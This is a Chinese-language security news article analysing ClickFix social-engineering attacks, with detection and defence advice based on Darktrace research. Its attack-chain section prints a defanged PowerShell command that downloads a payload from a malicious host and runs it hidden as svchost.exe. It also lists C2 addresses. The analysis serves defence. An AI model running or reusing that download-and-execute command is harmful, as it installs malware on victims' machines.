資訊安全新聞

ClickFix社交工程攻擊揭秘：如何利用人性弱點突破資安防線

1 引言：社交工程威脅的演變

社交工程攻擊已成為網路安全中的主要入侵途徑，根據近期業界分析，佔據了 70-90%的網路攻擊 [1]。在眾多新興威脅中， ClickFix 誘導技術 代表了社交工程策略的精密演進，該技術利用人性心理而非技術漏洞。這種技術於2024年3月首次被觀察到，因其高成功率與低技術門檻，已被 國家支持的進階持續性威脅（APT）團體 （包括俄羅斯的APT28和伊朗的MuddyWater）以及網路犯罪分子廣泛採用 [2]。ClickFix攻擊特別針對 人機互動點 ，通過偽裝成常規技術問題排查的惡意行為，繞過專注於惡意軟體特徵或異常網路模式的傳統安全控制。

Darktrace的分析顯示，ClickFix攻擊活動在2024-2025年間對 醫療、酒店、汽車和政府部門 的影響頻率日益增加 [3]。其技術複雜性不在於複雜的惡意軟體開發，而在於通過心理工程化的提示， 精準操縱使用者行為 ，模擬合法的系統訊息。本報告提供ClickFix攻擊鏈的技術剖析、偵測方法與防禦對策。

ClickFix社交工程攻擊揭秘：如何利用人性弱點突破資安防線 | 資訊安全新聞

2 ClickFix攻擊的技術架構

2.1 攻擊鏈工作流程

ClickFix攻擊遵循 四階段操作序列 ，旨在最小化數位痕跡並最大化存取權限：

階段1：初始存取途徑
攻擊者通過 魚叉式釣魚郵件 （58%案例）、 被入侵的合法網站 （32%）或 可信平台如GitHub （10%）傳送惡意連結 [4]。誘餌通常偽裝成「修復」提示、CAPTCHA驗證或設備註冊頁面。技術分析顯示，這些活動中使用的 96%的釣魚域名 是已建立的合法域名，而非新註冊的域名，增加了可信度 [5]。
階段2：使用者操縱序列
使用者點擊後，被引導通過 三步驟互動流程 ：
1. 觸發Windows執行對話框 ：提示使用者按下 Win + R
2. 貼上惡意PowerShell指令碼 ：指令碼自動複製或由使用者手動貼上（ CTRL+V ）
3. 執行Payload ：使用者按下 Enter 執行指令
此工作流程利用 使用者對問題排查步驟的熟悉度 ，同時繞過應用程式控制限制，因為PowerShell是受信任的管理工具。
階段3：指令執行與持久性
執行的PowerShell指令碼具有 多態特性 ，無固定特徵。Darktrace研究人員分析的一個代表性樣本：
```
Start-Process powershell -ArgumentList "-nop -w hidden -ep bypass -c 
[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
iwr hxxps://malicious-domain[.]top/1741714208 -OutFile $env:temp\svchost.exe;
Start-Process $env:temp\svchost.exe" -WindowStyle Hidden
```
此指令碼：
(1) 啟用TLS 1.2以規避協議檢查
(2) 通過HTTPS下載數字命名的Payload
(3) 從臨時目錄執行，偽裝成合法的svchost.exe
(4) 通過隱藏視窗保持隱匿性
階段4：後續攻擊活動
在入侵後的 10分鐘內 觀察到的活動包括：
- 橫向移動 ：下載符合正則表達式（ /174(\d){7}/ ）的數字模式檔案，包含偵察指令碼
- 資料外洩 ：通過HTTP POST請求將系統資訊傳送到 C2（已驗證IP：193.36.38[.]237）
- Payload部署 ：傳送XWorm、Lumma和AsyncRAT變種

2.2 技術創新

ClickFix引入三種新穎的規避技術：
1. Zero-Click Bypass ：部分變種使用剪貼簿注入，自動填充指令，無需手動貼上
2. Epoch Time Obfuscation ：檔案名根據Unix紀元時間動態生成（例如： /1744205200 ）
3. Living-off-the-Land (LotL) ：僅使用簽署的二進位檔案（PowerShell、BITSAdmin）進行後續攻擊

3 偵測方法：人工智慧驅動的異常偵測

Darktrace的偵測框架採用 無監督機器學習架構 ，為每個設備/使用者建立機率行為基準。系統聚焦於 42個行為指標 ，包括加密協議、目標服務模式和時間節奏 [6]。

3.1 ClickFix的偵測模型

在ClickFix攻擊中觸發的特定模型：

設備/新的PowerShell使用者代理 ：
偵測到罕見的PowerShell使用者代理字串，如 WindowsPowerShell/5.1.19041.3636 ，此前未觀察到
異常檔案/新使用者代理至數字下載 ：
在新使用者代理出現後，標記連續的數字檔案下載（準確率：92.7%）
異常連線/PowerShell至罕見外部 ：
識別PowerShell連接到組織內少於5次連線的目標

增強監控模型 通過貝氏機率網路將這些異常整合成高保真警報：

P(Threat|Anomalies) = [P(A1|Threat)×P(A2|Threat)×P(Threat)] / Σ[P(A1|A)×P(A2|A)×P(A)]

其中A1...An為異常，依據稀有性加權 [7]。

ClickFix攻擊中偵測模型的效能
模型	偵測率	平均偵測時間	誤報率
新的PowerShell使用者代理	76%	8.2秒	12%
數字檔案下載	88%	4.7秒	5%
增強監控	97%	<1秒	1.3%

3.2 自主回應工作流程

啟用時，Darktrace的 Antigena模組 執行五階段遏制協議：
1. 網路分割 ：通過API整合在交換器層級隔離受損設備
2. C2阻斷 ：通過動態防火牆規則終止與惡意IP的連線
3. 程序暫停 ：通過端點代理整合停止惡意程序
4. 流量重新導向 ：將外洩嘗試的流量鏡像至誘捕環境
5. 數位鑑識擷取 ：保留攻擊Artifact以供分析

在一個觀察案例中，自主回應在連線啟動後的 1秒內阻斷了對138.199.156[.]22的外洩 [8]。

4 案例研究：攻擊時間線重建

Darktrace的威脅研究團隊記錄了一起於2025年4月9日針對歐洲醫療提供者的完整ClickFix事件：

T+0:00 ：來自行銷工作站的初始PowerShell執行
T+0:03 ：從193.36.38[.]237下載 /1744205200 檔案（3.2MB）
T+0:07 ：執行內部偵察指令碼，掃描SQL伺服器
T+0:12 ：通過HTTP POST向同一IP外洩資料（12.7MB病患記錄）
T+0:18 ：連線至次要C2（188.34.195[.]44），發送 /init1234 請求

數位鑑識分析顯示，數字檔案包含一個自訂的.NET組件，設計用於：
- 使用Mimikatz衍生工具從記憶體中收集認證
- 識別安全性薄弱的醫療物聯網設備
- 建立偽裝為「Adobe Update」的持久性排程任務

5 防禦策略：技術與人性對策

5.1 技術控制

PowerShell限制 ：
實作 受限語言模式 並啟用稽核日誌：

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell]
"EnableScripts"=dword:00000001
"ExecutionPolicy"="Restricted"

行為分析 ：部署異常偵測，針對：
- 數位檔案下載模式
- 新的PowerShell父程序
- 時間異常（例如：非工作時間的PowerShell執行）
網路分割 ：
限制工作站的出站連線，僅允許 白名單上的目標

5.2 人性因素緩解措施

針對性安全訓練 ：
模擬ClickFix情境，強調：
- 辨識偽造的系統訊息
- 驗證PowerShell指令來源
- 報告異常的問題排查請求
程序控制 ：
對任何管理指令執行實作 雙重審批要求
建立 釣魚回應劇本 ，遏制時間SLA < 5分鐘

6 結論與未來研究方向

ClickFix代表了社交工程攻擊的範式轉變，通過精密的 心理操縱 武器化 合法系統功能 （PowerShell、執行對話框）。防禦這些威脅需要結合 人工智慧驅動的異常偵測 與 以人為中心的安全控制 。

未來研究應優先考慮：
1. 自然語言處理 ：分析社交工程誘餌的語言模式
2. 行為生物識別 ：偵測攻擊序列中的異常使用者互動
3. 跨平台偵測 ：將保護擴展至雲端殼層（AWS CLI、Azure PS）
4. 預測情報 ：使用強化學習模擬攻擊者策略、技術與程序（TTP）的演進

Darktrace的方法顯示，雖然 98%的網路攻擊涉及社交工程 [9]，但無監督人工智慧與自主回應的結合可將每次事件的違規成本降低 高達173,000美元 。隨著攻擊者持續精進以人為中心的策略，安全框架必須超越傳統的周邊防禦，演進為基於行為的保護模型。